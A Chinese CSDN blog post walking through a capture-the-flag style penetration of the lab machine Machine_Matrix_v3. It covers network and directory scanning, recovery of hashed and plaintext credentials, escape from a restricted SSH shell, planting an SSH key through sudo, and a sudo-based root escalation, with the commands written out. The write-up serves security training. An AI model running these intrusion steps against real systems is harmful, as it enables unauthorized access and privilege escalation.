Machine_Matrix_v3 打靶渗透

于 2024-08-06 18:12:02 发布
阅读量547 收藏 7
点赞数 14
文章标签: 网络 web安全 网络安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140962474
版权

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.157

4、查看靶机的80端口,在页面上发现一个用户glad:

5、扫描80端口的目录,查看是否有有用信息:

dirsearch -u "http://192.168.13.157"

6、拼接目录进行访问发现有很多文件:

7、点击查看在查看一张兔子照片时,照片的名字给了我们提示:

8、在80端口后面拼接Matrix进行访问:

9、点击查看,发现有一个名为secret的文件:

10、在kali上面下载这个文件进行查看:

wget http://192.168.13.157/Matrix/n/e/o/6/4/secret.gz

gunzip secret.gz

Ls

file secret.gz

cat secret.gz

admin:76a2173be6393254e72ffa4d6df1030a

11、使用md5进行解密:

密码是passwd

12、之前扫描端口的时候,发现开放了7331端口,访问一下:

13、是一个登录框,使用账号和密码尝试登录,成功登录:

14、进行目录扫描,查看是否有有用信息:

dirb http://192.168.13.157:7331/ -u admin:passwd -w

15、拼接访问查看:

16、kali下载这个data文件,进行查看:

wget http://192.168.13.157:7331/data/data --user=admin --password=passwd

17、发现这个文件是windows文件,查看不了,将文件访问ida中进行查看:

18、发现有一个guest用户及密码为:7R1n17yN30,之前端口扫描时发现ssh服务在6464端口运行:

ssh guest@192.168.13.157 -p 6464

19、获取到shell但是命令执行很受限:

二、提权

1、使用命令 -t “bash --noprofile” 来禁止相关的启动脚本,从而获得完整的 shell,这样可以正常执行命令,查看用户的sudo权限:

ssh guest@192.168.13.157 -p 6464 -t "bash --noprofile"

2、guest 账户下的 .ssh 文件删除,重新生成 .ssh:

rm -rf .ssh

ssh-keygen

3、给所有文件赋予全部的执行权限:

4、将公钥 id_rsa.pub 复制给 trinity 账户下的 .ssh/authorized_keys,使用 ssh 携带 guest 的密钥在环回接口登录:

sudo -u trinity /bin/cp .ssh/id_rsa.pub /home/trinity/.ssh/authorized_keys

ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464

sudo -l

5、发现用户有sudo权限,将 /usr/bin 目录下用的 bash 可执行文件复制给 trinity 目录下的 oracle 文件,赋予执行权限,然后执行这个文件进行sudo提权,提权之后查看root目录下的flag.txt:

cp /usr/bin/bash oracle

chmod +x oracle

sudo ./oracle

cd /root

cat flag.txt

搬砖小星
关注
  • 14
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tensor-machines-master_support_machine_matrix_
10-03
支持矩阵机(Support Matrix Machine, SMM)是一种用于矩阵型数据分类的机器学习算法,它扩展了传统的支持向量机(Support Vector Machine, SVM)的概念。SVM在处理向量数据时表现出色,而SMM则针对矩阵或图数据进行...
dc.rar_dc machine_induction machine
09-19
标题中的"dc.rar_dc machine_induction machine"暗示了我们讨论的主题是关于直流电机(DC Machine)和感应电机(Induction Machine)的模型或仿真。在MATLAB的Simulink环境中,这两种电机是电气工程领域常见且重要的...
nomachine_7.4.1_1.exe
05-07
nomachine_7.4.1_1.exe
Machine_learning_complete.rar
06-05
国外机器学校教程, Introduction, Regression Analysis, and Gradient Descent
MAS.zip_SIMULINK_induction machine_zip
09-20
标题中的“MAS.zip_SIMULINK_induction machine_zip”暗示了这是一个与Simulink相关的压缩文件,专注于模拟感应电机(induction machine)的工作。Simulink是MATLAB的一个扩展,用于建立动态系统的模型,并进行仿真...
未知攻焉知防:从攻击者视角看网络安全的“攻守之道”
科技云报道
08-01 406
基于独特的“动态安全+AI”技术思想,瑞数信息综合运用自动化攻击保护、0day防护、多源低频防护、多维度分层分级对抗等多种安全防护策略和手段,还推出瑞数WAAP超融合平台,支持WAF、Bots防护、0day攻击防护、应用DDoS防护、API安全防护等多项安全产品单独或联合部署,能够覆盖Web、移动App、H5、API及IoT全应用渠道,提供多层级的联动防御机制,令企业在各类复杂的环境中,都可以轻松实现应用安全一体化防御。其次,由于供应链数量众多,类型错综复杂,导致安全难以做到统一管理,供应链风险与日俱增。
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 635
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 568
Vulnhub系列Connect-The-Dots靶场做题记录
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 833
计算机网络—三种交换方式图文详解
Springboot+Websocket+Security+Vue 实现弹幕推送功能
Gemini1995的博客
08-01 636
【代码】Springboot+Websocket+Security+Vue 实现弹幕推送功能。
堡垒机简单介绍
凡尘
08-05 420
堡垒机是一种用于控制和管理网络安全的重要工具,它在一个特定的网络环境下,为了保障网络和数据不受入侵和破坏,运用各种技术手段监控对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便于集中报警、及时处理及审计定责。登录功能:提供安全的远程访问接口。账号管理:实现对所有服务器、网络设备、安全设备等账号的集中管理。身份认证:对访问内部网络的用户进行身份验证。资源授权:基于用户、目标设备、时间、协议类型等要素实现细粒度的操作授权。访问控制。
接口测试学习笔记1
weixin_53666393的博客
08-03 878
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
自动获取ip地址什么意思?电脑ip地址怎么设置自动获取
hgdlip的博客
08-02 1082
在当今数字化时代,网络连接已成为我们日常生活和工作中不可或缺的一部分。然而,对于非技术用户而言,复杂的网络配置常常令人望而生畏。幸运的是,自动获取IP地址(Dynamic Host Configuration Protocol, DHCP)技术的出现,极大地简化了这一过程,让网络配置变得更加轻松和高效。下面跟着虎观代理小二一起来了解一下探讨自动获取IP地址含义,并详细介绍电脑怎样设置自动获取IP地址。
Modbus通讯协议
qq_3517289697的博客
08-02 728
Modbus协议是一种用于电子控制器之间的通信协议,‌它允许不同类型的设备之间进行通信,‌以便进行数据交换和控制。‌Modbus协议最初为可编程逻辑控制器(‌PLC)‌通信开发,‌现已广泛应用于工业自动化领域,‌包括但不限于工业控制、‌楼宇自动化、‌能源管理等领域。‌该协议支持多种通信接口和物理介质,‌包括串行(‌RS-232、‌RS-485等)‌、‌以太网以及无线通信等,‌使其能够适应各种不同的应用场景。‌。
Java实现抓包并将数据呈现到前端
LB_bei的博客
08-05 197
环境:windows10、jdk17、springboot3需求分析,首先需要对本地某个端口进行抓包,然后用websocket将数据传到前端。
Spark Steaming有状态转换实验
m0_59508634的博客
08-01 1203
打开一个新的shell窗口,切换到logfile目录下,创建一个log.txt文档保存,再创建一个log_new.txt文档保存,里面输入一些随意的单词,并用空格间隔开。注:log.txt输入为“a b c a b c d”,log_new.txt输入为“a b d e f a b e f”。在服务端输入以下字符串,并按回车,可以在客户端收到消息,并打印出来。在客户端输入字符串,并按回车,可以在服务端收到消息,并打印出来。的回滚来查看结果,因为回滚较快,所以在运行状态下查看结果截图较困难。
计算机网络-PIM协议基础概念
Linux基础知识、计算机网络基础学习分享。
07-31 606
PIM-SM模式主要用在组成员较多且相对稀疏的组播网络中,该模式建立组播分发树的基本思路是先收集组成员信息,然后再形成组播分发树。(PIM-Dense Mode,PIM密集模式),PIM-DM模式主要用在组成员较少且相对密集的组播网络中,该模式建立组播分发树的基本思路是“扩散-剪枝”,即将组播流量全网扩散,然后剪枝没有组成员的路径,最终形成组播分发树。PIM-SM模式主要用在组成员较多且相对稀疏的组播网络中,该模式建立组播分发树的基本思路是先收集组成员信息,然后再形成组播分发树。作为组播路由解决方案,
探索全光网技术 | 全光网络技术方案选型建议三(医院场景)
正月十六工作室
08-05 616
同时,全光网络还支持冗余设计和备份路径,确保在网络出现故障时能够迅速恢复业务,保障医疗业务的连续性。而全光网络则具有长距离传输的优势,能够轻松覆盖医院的各个角落,包括手术室、病房、实验室等关键区域。老话说的好,网络3分建7分管。:汇聚层位于核心层和接入层之间,负责连接核心层和接入层的设备,实现网络流量的汇聚和分发。应采用高带宽、低时延的光纤传输介质,并结合高速交换技术和容错技术,确保数据的可靠传输。远程医疗协作:实现高清视频会议、远程手术指导等应用,要求网络具备极低的时延,以保障医生间的实时沟通和协作。
哪些系统需要按照等保2.0进行定级?
最新发布
2301_79955948的博客
08-05 726
等保2.0(网络安全等级保护2.0)是中国政府制定的网络安全标准,旨在提高网络系统的安全防护能力,降低网络安全风险,保护国家安全、社会秩序和公民权益。等保2.0将网络系统分为五个安全保护等级,从第一级到第五级,每个级别对应不同的安全保护要求。
_MACHINE_FRAME
04-10
_MACHINE_FRAME是一个用于机器学习和深度学习的开源框架。它提供了一系列工具和库,用于构建、训练和部署机器学习模型。_MACHINE_FRAME支持多种常见的机器学习算法和模型,包括神经网络、决策树、支持向量机等。它还提供了丰富的数据处理和特征工程功能,以及模型评估和调优的工具。 该框架的设计目标是简单易用、高效可靠。它提供了直观的API和文档,使得用户可以快速上手并进行模型开发。同时,_MACHINE_FRAME还支持分布式计算,可以在多台机器上进行模型训练和推理,以加速计算过程。 除了基本的机器学习功能,_MACHINE_FRAME还提供了一些高级功能,如自动特征选择、模型解释和可视化等。这些功能可以帮助用户更好地理解和解释模型的行为,并进行模型的优化和改进。 总之,_MACHINE_FRAME是一个功能强大、易用性高的机器学习框架,适用于各种规模和复杂度的机器学习任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值